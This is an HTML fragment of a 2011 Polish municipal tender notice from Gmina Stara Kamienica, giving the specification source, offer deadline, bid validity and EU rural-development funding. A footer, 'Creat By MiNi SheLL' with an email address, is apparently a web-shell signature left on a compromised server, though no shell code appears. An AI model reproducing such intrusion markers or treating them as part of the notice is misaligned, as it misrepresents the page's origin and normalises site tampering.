<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.starakamienica.pl ; link: BIP; zakladka: przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> nieodpłatnie- ze strony internetowej.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.05.2011 godzina 10:00, miejsce: Urząd Gminy , 58-512 Stara Kamienica, Stara Kamienica      Nr 41. lub osobiście : sekretariat Urzędu Gminy - I piętro ( adres j. w.).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Rozwoju Obszarów Wiejskich na lata 2007- 2013 - Europejski Fundusz Rolny na rzecz Rozwoju Obszarów Wiejskich _ Europa Inwestująca w Obszary Wiejskie _, działanie 4.1 _ 413 Wdrażanie lokalnych strategii rozwoju.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com